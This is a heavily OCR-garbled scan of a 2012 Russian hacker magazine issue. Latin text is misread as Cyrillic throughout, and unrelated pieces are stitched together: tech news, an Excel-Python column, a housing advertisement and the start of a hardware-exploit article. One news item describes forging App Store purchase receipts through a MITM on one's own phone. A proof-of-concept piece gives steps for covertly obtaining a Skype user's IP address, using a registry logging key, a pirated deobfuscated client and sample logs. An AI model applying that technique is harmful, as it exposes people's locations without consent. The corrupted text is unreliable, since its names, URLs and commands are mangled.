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СКОРО ИГРОВАЯ ПЛАТФ0РМА5ТЕАМ СТАНЕТ ДОСТУПНА И ДЛЯ ИІШХ. Компания Ѵаіѵе уже работает над клиентским модулем. 



УПРАВЛЕНИЕ ПАРОЛЯМИ 
ЧЕРЕЗ ВШЕТООТН-КЛЮЧ 

ИНТЕРЕСНАЯ ИДЕЯ ОТ КОМПАНИИ РОКБ 



ЕАСЕВООК 

АНАЛИЗИРУЕТ НАШУ 
ПЕРЕПИСКУ 




Наданный 
моментРогсі 
КеуРгее І-одіп 
доступен только 
воФранции,но 
этообещаютис- 
правитьвскором 
будущем. 



огласись, запоминать кучу паролей от различных сайтов, серви- 
сов и та к далее все-таки тяжело. Использовать везде одинаковые 
и простые пароли — тоже не особенно хорошо, равно как и хранить их 
в каком-нибудь менеджере (все это ощутимо снижает безопасность). Остает- 
ся либо завести Секретную Бумажку, либо искать какие-то альтернативы. 

Не совсем обычное решение проблемы предлагает компания РогсІ, раз- 
работавшая технологию РогсІ КеуРгее І_одіп. Пока решение реализовано 
в виде приложения для іРЬопе, и для управления паролями и аутентифика- 
цией используется протокол ВІиеІооіЬ. Суть проста: кактолько смартфон 
оказывается в радиусе действия беспроводного модуля компьютера, система 
автоматически производитаутентификацию на всех сервисах, которыеуста- 
новлены в настройках. Кроме приложения для іРЬопе, нужно также устано- 
вить расширение для Соодіе СИ готе. С его помощью система осуществляет 
быстрый вход на определенные сайты, и пользователю нетребуется ничего 
вводить вручную. Смартфон выступает в роли уникального беспроводно- 
го аутентификатора. Когдаустройство покидаетзону действия ВІиеІооіЬ, 
система автоматически делает Іодоиі из всех веб-служб, где была произ- 
ведена авторизация. Прототипом РогсІ КеуРгее І_одіп выступила бесконтакт- 
ная система управления сигнализацией автомобиля, также выполненная 
в виде мобильного приложения. Успех от внедрения технологи и КеуРгее для 
автомобилей подтолкнул инженеров РогсІ реализовать нечто подобное для 
повседневной жизни. 




НАЧАЛАСВОЮДЕЯТЕЛЬНОСТЬЛИГАЗАЩИТЫ ИНТЕРНЕТА 



КОАЛИЦИЯ ТЫСЯЧ АКТИ- 
ВИСТОВ, ПРЕДСТАВИТЕЛЕЙ 
КОМПАНИЙ И ТЕХНИЧЕСКИ 
ПРОДВИНУТЫХ полити- 
ков ЗАРАБОТАЛА ПО АДРЕСУ 
ІЫТЕЯНЕТОЕРЕНБЕСЕАОІІЕ.ОЯб 



ЗАПОЛЬЗОВАТЕЛЯМИ ШПИОНЯТ БУКВАЛЬНО ВСЕ- 
КОНЕЧНО, «ВО ИМЯ ДОБРА» 

од эгидой борьбы с педофилами и террористами 
в Сетитворятся чудные вещи. РІедавно дирек- 
тор по безопасности РасеЬоок Джо Салливан 
спокойно поведал в интервью агентству «Рейтер», что 
социальная сеть использует в Штатах автоматиче- 
ские алгоритмы сканирования чатов и другой личной 
информации пользователей. Конечно же, с целью поиска 
и раннего выявления преступлений. И ведь даже нельзя 
сказать, что переписку пользователей читают исключи- 
тельно роботы. Дело в том, что алгоритм только скани- 
рует переписку и публикации пользователей РасеЬоок, 
но если он обнаруживает подозрительную активность, 
то помечает профиль и сообщает о нем специальному 
сотруднику РасеЬоок. Именно сотрудник оценивает 
степень опасности и в случае необходимости сообщает 
о потенциальном преступнике в полицию. Это доволь- 
но неожиданная новость — раньше считалось, что сам 
РасеЬоок не занимается мониторингом чатов в пользу 
полиции, а только может выдать распечатки чат-сессий 
по полицейскому или судеб ному за просу. Оказывается, 
он осуществляет и превентивные меры. Джо Салливан 
подчеркивает: «Чтобы не сталкиваться с ситуацией, 
в которой нашим сотрудникам приходится читатьчужую 
переписку, мы используем систему с очень низким про- 
центом „ложных срабатываний"». 

Известно, что используемая для мониторинга 
действий юзеров система сфокусирована на диалогах 
между пользователями с «бедными» связями. Подозри- 
тельными, по мнению РасеЬоок, являются случаи, когда 
два пользователя общаются, не являясь взаимными дру- 
зьями или став друзьями недавно. Совсем страшно, если 
у них при этом нет общих друзей, а прочие друзья взаи- 
модействуют с пользователями и друг с другом крайне 
редко. Также криминалом считается, если два пользова- 
теля имеют большую разницу в возрасте. Словом, если ты 
не особенно активный пользователь РасеЬоок с сотнями 
друзей и тебе за 30, поздравляем — ты явно потенциаль- 
ный педофил и террорист. 

Справедливости ради заметим, что система все-таки 
работает и даже приносит плоды. Так, «Рейтер» расска- 
зывает о случае, когда уда л ось арестовать 30 -летнего 
мужчину после того, какой в чате поговорил с 13-летней 
школьницей и назначил ей встречу. В переписке между 
ними регулярнофигурировалослово«секс». Полиция 
сумела предотвратить и их«встречу», и возможное 
преступление благодаря оперативной информации от 
РасеЬоок. И это только один из множества случаев, когда 
представители полиции СШАподтверждаютполучение 
заблаговременных «наводок» от РасеЬоок, то есть там 
действительно работает глобальная система монито- 
ринга. 

Конечно, борьбой с педофилами занимается не 
только РасеЬоок, ной разработчики других социальных 
сервисов, в том числе ориентированных на сетевые 
знакомства (например, мобильное приложение Бкоиі). 

В будущем подобные системы модерации планируют 
установить и другие сайты, у которых значительную 
часть аудитории составляют подростки. 
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МЕ6АЫЕѴѴ5 ЗА ПОЛГОДА В ТѴѴІТТЕК ПОСТУПИЛО 3378 ОБРАЩЕНИЙ по поводу нарушения авторских прав. Сервисудалил 5275твитов и 599 медиафайлов. 



СОРЕВНОВАНИЕ 

РОБОТОВ-ТРЕЙДЕРОВ 



ГРЯДЕТ НЕОБЫЧНЫЙ КОНКУРС 




»*■ М СЬ риАе щі^і ЯН 

— 1—2 9 - — — 13 5 8 







азличные программистские состязания уже не новость, 
такого рода мероприятий несколько десятков. Однако есть 
среди них и весьма экзотичные. Первого октября текуще- 
го года состоится шестой ежегодный конкурс Аиіотаіесі Тгасііпд 
СИатріопзЫр — это соревнование роботов-трейдеров.Ход конкурса 
прост: в режиме реального времени ботам предстоит заключать 
торговые сделки. Соревнование создано с целью популяризации 
автоматического трейдинга и языка программирования МеІаСіиоІез 
І_апдиаде5 (МСІІ_5], основанного на концепции С++. Прикладной 
языкМС|1_5 предназначен для автоматизации торговых стратегий. 
Программы на нем компилируются в исполняемые файлы, которые 
можно запускать в клиентском терминале МеІаТгасІег 5. Участни- 
кам предлагается разработать программы, торгующие на рынке 
по определенной стратегии. В течение трех месяцев роботы будут 
совершать торговые сделки, и чем больше они на них заработают, 
тем вышеокажутся в итоговойтаблице. Ниучастники, нижюри 
не смогут вмешиваться в торговый процесс. На сайте чемпионата 
(сЬатріопзЫр.тдІб.сот) будут публиковаться новости, интервью 
савторами лучших роботов и отчеты. В профиле каждого участника 
можно будет в режиме реального времени увидеть подробную стати- 
стику работы его программы. 




80 тысяч долларов — 
суммарный призовой 
фонд Аиіотаіесі Тгасііпд 
СЬатріопзНір. Победитель 
получит 40 тысяч, за второе 
место дадут 25 тысяч, а брон- 
зовый призер получит 15 
тысячдолларов. 



СЕРЬЕЗНЫХУЯЗВИМОСТЕЙ 
СТАНОВИТСЯ ВСЕ МЕНЬШЕ 



ПРИЯТНАЯ СТАТИСТИКА ОТ ѴУНІТЕНАТ5ЕСШІІТѴ 




а к правило, отчеты компаний, за ни мающихся информаци- 
онной безопасностью, выглядятудручающе:тысячи вирусов 
охотятся на беззащитных пользователей, в софте сплошь 
и рядом обнаруживаются уязвимости, и вообще — «все плохо». 

Редко когда выходитисследованиес противоположными вывода- 
ми. Такое исследование недавно опубликовала компания ѴѴЫіеНаІ 
Зесигііу, обеспечивающая безопасность веб-приложений. По ее 
данным, количество серьезных уязвимостей ощутимо сократилось 
за последнее время. Сотрудники компании собираютстатистику 
ежегодно, сканируя содержимое несколькихтысяч сайтов втечение 
всего года. Так, в 2011 году по результатам сканирования более 7000 
сайтов (сотни терабайт контента) им уда л ось обнаружить в среднем 
79 серьезныхуязвимостей на каждом сайте. Для сравнения: в 2010 
году таковых было 230, в 2009 году — 480, в 2008 году — 795, в 2007 
году — 1111. Радует и тот фа кт, что серьезные уязви мости стали 
быстрее устранять: в 2011 году среднее время закрытия уязвимости 
составило 38 дней, тогда как в 2010 году это за ни мал о 110 дней. 

Процентзакрываемыхуязвимостей в прошлом годутоже 
вырос с 53 до 63. Если рассматривать уязви мости потипам,тона 
первом месте по популярности остается межсайтовый скрип- 
тинг (Х55), который встречается на 55% сайтов. Далее утечки 
информации (53% сайтов), контент-спуфинг (36%), недостаточная 
авторизация (21%) и межсайтовая подмена запроса (С5РР, 19%). 
Только на восьмом месте в списке оказались 5(ЭІ_- инъекции: их 
обнаружили всего на 11% сайтов. 





ЗАПРЕТ НАДОСТУПКТНЕ 
РІКАТЕ ВАУ, БЛОКИРОВКА 
ІР-АДРЕСОВ НАУРОВНЕ ПРО- 
ВАЙДЕРОВ ВЕЛИКОБРИТАНИИ, 
НИДЕРЛАНДОВ И ДРУГИХ СТРАН 
В РЕАЛЬНОСТИ ОКАЗАЛИСЬ 
БЕСПОЛЕЗНЫ. После 1 февраля 
Р2Р-трафик не только остался 
примерно на том же уровне, 
что и раньше, но в какие-то 
дни даже превысил «добло- 
кадные» показатели, сообщил 
специалист голландского про- 
вайдера Х54АІІ. 




ѴѴІКІМЕОІАРОІМОАТІОН 
ПЛАНИРУЕТ СОЗДАТЬ ГИД 
ПОПУТЕШЕСТВИЯМ— бес- 
платный сервис, редакти- 
рованием которого мог бы 
заниматься каждый, как 
в случае с ѴѴікіресІіа. 




АМОИѴМОІІБ ЗАПУСТИЛИ 
САЙТ ДЛЯ ПУБЛИКАЦИИ 
РАЗЛИЧНЫХ ДАМПОВ: 

раг-апоіа.пеі . Если сайт не 
закроют власти, на разбор 
такого количества данных 
всеравноуйдутгоды. 
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ИЗ 6006І_ЕРІ_АѴТЕПЕРЬ МОЖНО УДАЛЕННО УПРАВЛЯТЬ ПРИЛОЖЕНИЯМИ на любых своих устройствах — удалять их или обновлять. 



ВАЖНА КАЖДАЯ СЕКУНДА 

ПЕРЕВОД МИРОВЫХАТОМНЫХ ЧАСОВ НАОДНУ СЕКУНДУ 
ПРИВЕЛ К МАССОВОМУ ЗАВИСАНИЮ СЕРВЕРНЫХ ПРИЛОЖЕНИЙ 

□ полночьсЗОиюнянаІ июля эталонные мировые атомные 
часы были приостановлены на одну секунду для синхрони- 
зации с астрономическим временем Земли. В связи с чем 
в последней минуте оказалась 61 секунда и некоторые часы стали 
показывать время «23:59:60» или два раза по «23:59:59». Из-за 
неспособности некоторых приложений обработать появление 
лишней секунды многиесайты испытывали проблемы (втом числе 
РебсШ, ЫпкесІІп и МогіІІа), наблюдалось массовое зависание сер- 
верных приложений (в основном Насіоор и Саззапбга), СУБД Му5СИ 
съедала все процессорные ресурсы, отключались ѴРІ4 -туннели 
на базе ОрепѴРІМ, зависали Ыпих-серверы (судя по ба г- репортам, 
с не обновленным ванильным ядром, собранным вручную). 

В большинстве случаев администраторы были вынуждены 
переза пустить зависшие серверы. Тем не менее для стабилиза- 
ции приложений, начавших потреблять излишние ресурсы СРІІ, 
достаточно было вручную выставить корректное время командой 
«баіе 'сіаіе + ,, %т%сI%Н%М%С%у.%5 ,,, ». Для некоторых систем до- 
полнительно могло потребоваться остановить демон пірсі на время 
выполнения данной команды и перезапустить пожирающие СРІІ 
приложения. 

Чтобы устранить негативный эффект, компания боодіе пред- 
ложила разбить лишнюю секунду на большой интервал корректи- 
ровки, с прибавлением каждый раз по миллисекунде, что приведет 
к плавному «размазывай ию» секунды по большому отрезку 
времени. Похожее готовое практическое решение (скриптЯхІіте. 
рі для плавного прибавления секунды) месяц назад опубликовал 
один из разработчиков Орега в своем блоге: доо.дІ/ѵВ45т . 



ОО0РЮІМАТЕЭ иМѴЕНВАІ. 


ТІМЕ 




ЦТС. 


ПНР чвдтт ИИ» 

Ч Л ЛЬ Іг' 




К 201 5 ГОДУ АВТО ЕВРОПЫ ОСНАСТЯТ СИСТЕМОЙ ЕСАІ_І_ 






ВСЕ НОВЫЕ МАШИНЫ 
В ЕВРОПЕ СКОРО 
УКОМПЛЕКТУЮТ 
СИСТЕМОЙ ВЫЗОВА 
СЛУЖБ СПАСЕНИЯ, 

ПО СУТИ —ДАТЧИКАМИ 
ПЕРЕДВИЖЕНИЯ 



НОВАЯ ГОЛОВНАЯ 
БОЛЬАРРІ_Е 



РОССИЙСКИЙ ХАКЕР «ВСКРЫЛ» АРР5Т0КЕ 




лексей Бородин 21-летний ресерчер из России умудрился 
устроить настоящий переполох в стане корпорации Арріе. 
Чтобы поставить«яблочников»науши, оказалосьдо- 
статоч но осуществить реверс-инжиниринг протокол а магазина Арр 
5іоге и опубликовать в Сети инструкцию ( сЫ:о.5и/20 12/07/а ррзіоге. 
Мші), какподделатьчеки Іп-Арр для покупок внутри приложений. 
Говоря проще, Бородин поведал миру, как«покупатьбесплатно» 
контент внутри любого приложения, например новые уровни, бону- 
сы, игровые предметы итакдалее. Не подумай, что хакер сделал это 
случайно или не заботился о последствиях — Бородин сравнивает 
Іп-Арр-покупки считерством ис«продажей воздуха», ведьвреаль- 
ности деньги берут за разблокировку контента, который уже и без 
того присутствуетнаустройстве. 

Способ хакер разработал универсальный, он действует практи- 
чески влюбом приложении. Потребуется лишьосуществитьатаку 
типа МІТМ на свой собственный смартфон, установив на него два 
фальшивых СА-сертификата и прописав фальшивый БІ45, который 
якобы кеширует ответы отсервера Арріе, подтверждая сделанную 
покупку. В подтверждение покупки фальшивый 0145-сервер выдает 
устройству фальшивую квитанцию стандартного образца. 

Буквально через неделю после публикации инструкции Алексей 
Бородин стал настоящей звездой: его показали по телека налу «Рос- 
сия», у него взяли интервьюдля несколькихсайтов, и даже газета 
«Ведомости» опубликовала про него статью в закрытом разделе, за- 
щищенном Іп-Арр-покупкой (вотдажезлобно шутитьнехочется на 
эту тему). Корпорация Арріе, в свою очередь, безуспешно пытается 
удал ить с различ ных хости нгов вышеупомянутые сертификаты и за- 
блокировать 0145-серверы. Пока все тщетно. Способ по-прежнему 
работает (по состоянию на 21 июля). По некоторым да иным, таким 
методом уже сделано более 8,46 миллиона бесплатных покупок. 

Арріе уже начала пробовать другие технические способы 
защиты. Недавно компания принялась внедрять уникальные 
идентификаторы в каждую квитанцию на подтверждение покупки. 
Разработчики сообщают, что в квитанции появилось новое поле 
«ип іцие ісІепііГег». Можно предположить, что оно должно содержать 
уникальный номер устройства ІІпщие йеѵісе ІсІепШчегІІЮЮ), со- 
вершающего покупку. 

Если так, то подобное действие идет в разрез с последней 
политикой Арріе, согласно которой приложениям запреща л ось со- 
бирать ІЮЮ с устройств. Та к что вполне возможно, что «уникальный 
идентификатор» будет соответствовать не устройству, а отдельной 
покупке. Если поэтому идентификатору покупка будет проводиться 
на сервере Арріе и сверяться с ним во время транзакции, то таким 
образом можно попробовать бороться с ха ком, который предло- 
жил Алексей Бородин. В конце июля специалисты Арріезакрыли 
уязвимость, и Бородин подтвердил в своем блоге, чтотеперьобход 
системы посуществующейтехнологии невозможен. 
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НЕДОЕВ 




КОЛОНКА СТЁПЫ ИЛЬИНА 

ПРОТО, КАК Я 
ЕХСЕІ_ С ПИТОНОМ 
ПОДРУЖИЛ 



БРЕДОВАЯ ИДЕЯ 

Есть миллионы людей, которые бесхитрост- 
но работают в ЕхсеІ с самыми обычными 
электронными таблицами. Есть очень редкие 
гики, которые используют максимум возмож- 
ностей встроенного ѴВА-языка, чтобы, к при- 
меру, обойти ограничение на запуск менед- 
жера задач, реализовав свой собственный. 

Я отношусь к первому типу :). Я сильно не 
люблю составлять отчеты. Придумать более 
унылое занятие невозможно: взять данные 
оттуда, вставить в таблицу, взять данные из 
другого места и опять вставить в таблицу. По- 
сле третьего такого отчета я решил это дело 
автоматизировать. Задача казалась вполне 
земной, если бы не одно но — иметь дело со 
встроенным ѴВА совершенно не хотелось. К 
тому же нужно было обрабатывать сложные 
форматы файлов, а писать с нуля парсер 
нисколько не привлекало. С документом надо 
было работать постоянно, поэтому вариант 
написать внешний скрипт на РуіГіоп, который 
на основе хів-шаблона создавал бы отчет, 
вставляя нужные данные, не годился (хотя 
изначально я хотел делать именно так). 

«Вот если бы в ЕхсеІ был встроен РуіГіоп 
для скриптинга, то все было бы в десять 
раз проще», — подумал я и набрал в Соодіе: 
«ехсеі ѵѵііГі руіГюп». Оказалось, что подобной 
ерундой был озадачен не только я :). 

ЕХСЕІ_ + РУТНОИ 

Один из первых найденных проектов — РуХІ_І_ 
[ ѵѵѵѵѵѵ.рухІІ.сот ) позволял быстро писать на 
питоне функции, которые далее можно было 
использовать наравне со стандартными 
функциями ЕхсеГя (вроде СУММАП). Я даже 
попробовал его в действии. Выглядит это так: 
ты пишешь РуіГюп-скрипт в соответствии с не- 
которыми правилами, реализуя необходимые 
действия с получаемыми данными, после чего 
через специальный аддон для ЕхсеГя импор- 
тируешь написанные функции. Не так плохо, 
но хотелось прямо в коде РуіГіоп обращаться к 



нужным ячейкам электронной таблицы. И это 
позволял другой найденный аддон ОаІаШго 
( сЫапіІхо.сопп ). После его установки в ЕхсеГе 
появляется новая вкладка, откуда вызывается 
редактор. Интеграция выполнена очень удобно, 
поэтому можно, не сильно заморачиваясь, на- 
писать что-то вроде: 

Се11(«А1») . ѵаіие = «Неііо, Іліогісі!» 

Далее запускаем сценарий с помощью 
кнопки на панели тулбара и получаем нужное 
значение в ячейке А1! Недолго думая, я стал 
наращивать функционал, который мне был 
нужен. Пробую импортировать библиотеки 
для работы с нужными форматами и прочи- 
тать данные — все работает. Запрашиваю че- 
рез АРІ информацию из нескольких онлайн- 
сервисов — все отлично агрегируется. 

Пишу простенькую приблуду для рассылки 
отчетов — все отлично отправляется. В итоге 
за тридцать минут удается сделать скрипт, 
который будет экономить два часа — те, что 
превращались для меня в пытку :). Сперва я 
даже начал выполнять в РуіГіоп все расчеты, 
лишь позже вспомнив, что с этим справится 
сам Ехсеі. Впрочем, если нужно посчитать 
что-то серьезное, то ничего не стоит подгру- 



зить математический модуль ІМитРу и делать 
любые научные вычисления. 

ВЫЖАТЬ МАКСИМУМ 

Скриптинг на РуіГіоп — всегда гарантия 
хорошей расширяемости приложения. Взять 
хотя бы редактор ЗиЫіте ТехП плагины для 
него есть уже на любой случай жизни. Впро- 
чем, можно не ходить далеко за примером. 
Один из создателей ОаІаІМіІго в качестве 
иллюстрации возможностей своей раз- 
работки написал на ЕхсеГе Тѵѵіиег-клиент 
(подробнее можно прочитать здесь: ЬіІ.Іѵ/ 
Резіші). Причем минимальными усилиями 
благодаря питоновской обертке для Тѵѵіиег 
АРІ — Іѵѵееру ( аШіиЬ.сотАѵѵеерѵАѵѵеерѵ ). 
Конечно, это всего лишь Ргооі'-оІ'-СопсерІ, 
но зато хорошая иллюстрация того, что 
интеграция с РуіГіоп с его огромным коли- 
чеством готовых модулей на любой случай 
жизни может быть очень полезной. Кстати, 
сделать такую фишку не так уж и сложно, о 
чем пишется в официальной документации 
РуіГюп. А освоить основы языка можно за 
полчаса. К слову, интерактивная школа 
по программированию Собеасабету как 
раз выпустила неплохой курс ( Гіир://ѵѵѵѵѵѵ. 
собесабетѵ.сот/ітаскз/рѵіі-іоп ) . И-И 




Вкладка аддона, с помощью которой реализуется интеграция ОаІаІЧіІго и Ехсеі 
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Анатолий Ализар (аіііагйдтаіі.сот) 



«и РгооРоРСопсерІ: 

СМОТРИМ ІР-АДРЕСА 
ф ПОЛЬЗОВАТЕЛЕЙ 5КѴРЕ 



ПРЕДЫСТОРИЯ 

Небольшая предыстория вопроса: слухи 
о раскрытии ІР-адресов пользователей Бкуре 
появились летом 2011 года, когда хакер Ефим 
Бушманов из Сыктывкара осуществил об- 
ратный инжиниринг старого протокола Бкуре 
(версий 1. х/3. х/4. х), запустил блог зкуре-ореп- 
зоигсе.Ыодзроі.сот и выложил бинарник 
деобфусцированного клиента. 

Дальше — больше. 25 марта 2012 года 
вышла деобфусцированная версия клиен- 
та 5 . 5 , которая могла полноценно работать 
в действующей сети Бкуре, — и началась 
настоящая веселуха. Благодаря расшифров- 
ке протокола стало понятно, где смотреть 
ІР-адрес при установке прямого соединения 
с пользователем, например, во время звонка. 
В апреле и вовсе появился взломанный 
БкуреКН: — серверная версия Бкуре, которая 
показывала ІР-адреса любых пользователей. 
Чуть позже выяснилось, что даже в клиент- 
ской деобфусцированной версии 5 . 5 , а именно 
в отладочных логах программы, можно по- 
смотреть ІР-адрес любого пользователя, если 
запросить его ѵСагсІ (информация о контакте). 
При этом даже необязательно добавлять 
его в контакты, то есть ІР-адрес отображается 
незаметно для жертвы. 

ЗАЧЕМ ЭТО НУЖНО 

Зачем узнавать ІР-адрес пользователя? Во- 
первых, из чистого любопытства. Интересно, 
в каком городе и стране живет человек, 




каким провайдером пользуется. Во-вторых, 
это нужно для проверки личности человека, 
который вышел с вами на контакт: тот ли он, 
за кого себя выдает. Наконец, эта процедура 
позволяет проверить самого себя, то есть 
не запущен ли где-то на стороннем компьюте- 
ре инстанс Бкуре с таким же именем пользо- 
вателя. В отладочных логах будут указаны все 
ІР-адреса, по которым работает клиент. 

Если кто не понял: протокол Бкуре устро- 
ен таким образом, что вы можете запустить 
инстансы клиента на нескольких компью- 
терах и все текстовые сообщения будут 
поступать одновременно во все инстансы. 
Хотя и говорят, что МісгозоЙ переделывает 
архитектуру Бкуре для массовой прослушки 
пользователей, но пока это лишь домыс- 
лы. На сегодняшний день самый реальный 
способ прослушивать пользователя — узнать 
его пароль и запустить у себя дополни- 
тельный инстанс клиента под его учетной 
записью. 



КАК ИСПОЛЬЗОВАТЬ 

ІР-адреса пользователей указаны в отладоч- 
ных логах ( сІеѵеІорег.зкуре.сот/Бкуребагаде/ 

1_одРі1е ). но в обычной версии клиента Бкуре 
эти логи зашифрованы. Поэтому нужно сде- 
лать две вещи: 

1. Включитьзаписьлогов. В реестре 
ѴѴіпсІоѵѵз добавляем ключ в разделе 
[НКЕѴ_СІІРРЕІМТ_ІІ5ЕР\5оН:ѵѵаге\5куре\ 
РЬопе\ІЛ\6епегаІ]: 

"і-о^іпе;" ="5кѵреРеЬіщ20ѲЗ" 

После этого Іод-файлы типа беЬид- 
УеагМоп1:ЬОа1:е-1:іте.Іод создаются в папке 
Бкуре. 

2. Запустить деобфусцированный кли- 
ентБкуре 5.5 или 5.9 КЬерігаІеЬаѵ.зе/ 

І:оггеп1:/7238404 ). в котором отладочные 
логи записываются в расшифрованном 
виде. 

Когда все готово, нужно сделать так, чтобы 
запись о нужном контакте попала в отладоч- 
ный лог. Для этого достаточно выбрать в меню 
функцию «Добавить контакт» — и указать 



нужный ник. Затем можно закрыть клиент 
и идти изучать текстовый лог (см. листинг). 
Нужно найти поле РгезепсеМападег с ником 
пользователя. 

В расшифрованных логах отображаются 
реальный ІР-адрес (с ключом -г) и локальный 
ІР-адрес сетевой карты (-1) юзера. Внутренний 
адрес нужен Бкуре, потому что он в некоторых 
случаях использует передачу трафика по ло- 
кальной сети. 

Интересно, что информация об ІР-адресе 
доступна, даже если пользователь находится 
в офлайне. Как показывает опыт, ІР-адрес 
пользователя хранится несколько дней. Если 
он ушел в офлайн на более длительное время, 
ІР-адрес исчезает из сети. 

зкѵреББраІісІіесІ . ехе 

РЮ5 7381с1еес13е9937е-Р2206-РбЬес1023с47 
5НА-1 1831е6631Ь95е93173сІ899а256769с02с 
сЗІеЬѲб 

ЕР2К е243с24с67-Ра-Р733-Р39828сІсІ-Рс4а50-Р8 



зкѵре59_ра1:сІіесІ . ехе 
РЮ5 1233сВ2е9сЬ54684с-Ра7се093033еЗа1 
5НА-1 69сІ50а22019842Ье494-Р5с857сІсІ40-Ра5Ь7 
-Р2сІссІЬ 

ЕР2К 16с9617а0е1с0236есса39сШ5-Р7-Р4а0 



Лог Бкуре (фрагмент): 

00:26:34.406 Т#3604 Кои*ег: 

_д гг 5 0хе9Ь65734с94911сІ5- 
3-3213.165.179.165:40006- 
г86 . 57 . 149 . 147 : 25801 - 1192 .168.0.80: 25801 
2 2 0 1 _0 

00:26:34.406 Т#3604 РгезепсеМападег: 
бГе 0ІесІікаѲ2321 0хе9Ь65734с94911сІ5- 
з - 5213 . 165 . 179 . 165 : 40006- 
г86 . 57 . 149 . 147 : 25801 - 1192 .168.0.80: 25801 
_80000003 

00:26:34.406 Т#3604 РгезепсеМападег: 
аіі о!есІіка02321 е9Ь65734 с94911сІ5 0 1 
іпгЕіа! ріп§_ 

Как видишь, мы без особых усилий вы- 
тянули ІР-адрес собеседника из деобфусци- 
рованных логов. Но будь осторожен с этой 
техникой — Бкуре банит аккаунты, которые 
очень часто запрашивают ѵСагсІ. ПЕ 



ХАКЕР 09/164/2012 



017 







І'ІІ 
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плюс 



ИПОТЕКА 

«Монолит плюс» активно 
работает с ведущими банка- 
ми по программам ипотечного 
кредитования. Особое внимание 
уделяется правовой защищен- 
ности клиентов, приобретателей 
жилья и нежилых помещений. 



«МОНОЛИТ ПЛЮС» ПРЕДЛАГАЕТ ПРОСТОРНЫЕ 
КВАРТИРЫ СОВРЕМЕННОЙ ПЛАНИРОВКИ В 5-ТИ 
СЕКЦИОННОМ ДОМЕ ПЕРЕМЕННОЙ ЭТАЖНОСТИ. 
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ДОПОЛНИТЕЛЬНУЮ ИНФОРМАЦИЮ О ПРОДАЖЕ КВАРТИР В ЖК «НА ВЫСОТЕ» 
МОЖНО ПОЛУЧИТЬ В ОФИСЕ ПРОДАЖ КОМПАНИИ «МОНОЛИТ ПЛЮС» 








ЗАО «МОНОЛИТ ПЛЮС» - 
ИНВЕСТИЦИОННО-СТРОИТЕЛЬНАЯ 
КОМПАНИЯ, ВХОДИТ В СОСТАВ 
ГРУППЫ КОМПАНИЙ «монолит», 
РАБОТАЮЩЕЙ В МОСКОВСКОЙ 
ОБЛАСТИ С 1989 ГОДА. 



Компания осуществляет полный спектр услуг в процессе 
реализации строительных проектов. Год за годом 
компания «Монолит плюс» совершенствует технологии 
инвестирования, выполняет функции технического 
заказчика и функции технического надзора заказчика 
за строительством объектов. 





Сегодня Королев - красивый, современный, 
комфортный город, город космического 
кораблестроения, который сегодня активно 
застраивается. Город ориентирован на моло- 
дых и энергичных людей. Это самодостаточ- 
ный город, обеспечивающий все потребности 
людей здесь и сейчас. Здесь сочетаются все 
преимущества городской среды с прекрасной 
природой: множество парков, в том числе и 
«Лосиный остров», река Клязьма. 



Балконы и лоджии осте- На территории расположены 

клены, что придает дому благоустроенные детские 

элегантность и сохраняет площадки и площадки для 

единый архитектурный стиль активного отдыха, гостевая 

жилого комплекса. стоянка. Предусмотрена 

подземная парковка. 
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Будущие новоселы могут выбрать квартиру как на одного 
человека, так и для большой семьи. В доме представлены 
квартиры от 1 до 4 комнат. С подробными схемами 
планировок квартир и проектной декларацией можно 
ознакомится на сайте ѵѵѵѵѵѵ.ак-топоііі.ги 



МОСКОВСКАЯ ОБЛАСТЬ, Г. КОРОЛЕВ, 
ПРОЕЗД МАКАРЕНКО, Д. 1 



( 495 ) 516 - 40-04 



С0ѴЕР5Т0КѴ 



Багц'аг Защита (БаІзигайгООіѵѵОгт.сот, 1\л/іиег.сот/5ап]аг_5аІ5ига) 



Железный 





Сегодня мало кого удивишь эксплойтами для 
разных операционных систем и программного 
обеспечения. Исследователи научились 
обходить различного рода защиты, такие 
как йЕР, А5І_Р, ЫХ Ьіі, так называемую 
песочницу, эмуляторы кода и прочие системы 
виртуализации. Время меняет многое: еще 
вчера уязвимости в аппаратном обеспечении 
были объектом фантазий исследователей 
ИБ, сегодня это реальность. Я расскажу тебе 
о «железных» эксплойтах и малвари. 



Представь, к чему может привести обнаружение уязвимости 
в микропроцессоре. После эксплуатации такой ошибки уже не 
нужно обходить какие-либо средства защиты ОС. Что немало- 
важно, портирование такого эксплойта для разных ОС не будет 
представлять какой-либо сложности. Это связано с реализацией 
НАС (Нагсіѵѵаге АЬзІгасІіоп І_ауег — слой аппаратных абстракций), 
а также с тем, что низкоуровневые компоненты ядра для работы 
с оборудованием на многих ОС практически одинаковы. Поми- 
мо этого, основным преимуществом эксплойтов, заточенных на 
хардварные уязвимости, является возможность трансформации 
вектора эксплуатации с удаленного на локальный (гетоІе2ІосаІ) 
и наоборот (ІосаІ2гетоІе). Как ты уже понял, трансформация век- 
тора эксплуатации с локального на удаленный представляет для 
нас наибольший интерес :). Правда, иногда при трансформации 
мини-фильтры ядра обрезают/искажают обрабатываемые данные 
(правила мини-фильтров обычно появляются после очередных 
патчей, например по вторникам), но и это не помеха. Обход состоит 
из применения морфа/виртуализации кода или специально за- 
готовленных гаджетов. 

Чтобы ты понимал, насколько ситуация критическая, рассмо- 
трим наглядный пример, разложенный на несколько основных 
этапов. 

1. Злоумышленник посылает подготовленный ТСР- или ІЮР-пакет 
на любой открытый порт целевой машины. 

2 . Пакетпроходитчерезсетевую карту, вызывая исключение, 
которое планировщик ядра ставит в очередь. Так как приоритет 
нашего исключения высок, при вытесняющей многозадачности 
планировщика ОС пакет будет обработан ядром исключительно 
быстро, пройдя сквозь полымя мини-фильтров и встроенного 
монитора безопасности ядра. 



ВВЕДЕНИЕ 



новый виток 

РАЗВИТИЯ 

эксплойтов 
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Железный дуршлаг 



3. Кодбудетобработан центральным микропроцессором или кон- 
кретным контроллером (в режиме ОМА), для которого предназна- 
чалась порция данных, доставленная рассматриваемым пакетом. 

4. В итоге имеем порабощенную машину. 

5. РРОРІТ! :) 



ЧЕМ ЕДЯТ «ЖЕЛЕЗНЫЕ» ЭКСПЛОЙТЫ 

Для полного понимания сути вещей рассмотрим основные этапы 

выявления и эксплуатации уязвимостей в железе. 

1. Анализ — анализ оборудования на предмет выявления ошибок 
и уязвимостей. Существует два типа анализа — статический (он 
же реверс-инжиниринг, достаточно трудоемкий) и динамический 
(«сІитту»и шаблонный фаззинг). В первую очередьты должен 
знатьбазовую матчасть(см. ссылки), это поможеттебедостичь 
понимания, что именно необходимо анализировать. Современные 
микропроцессоры имеют свои слабые места, к основным из них 
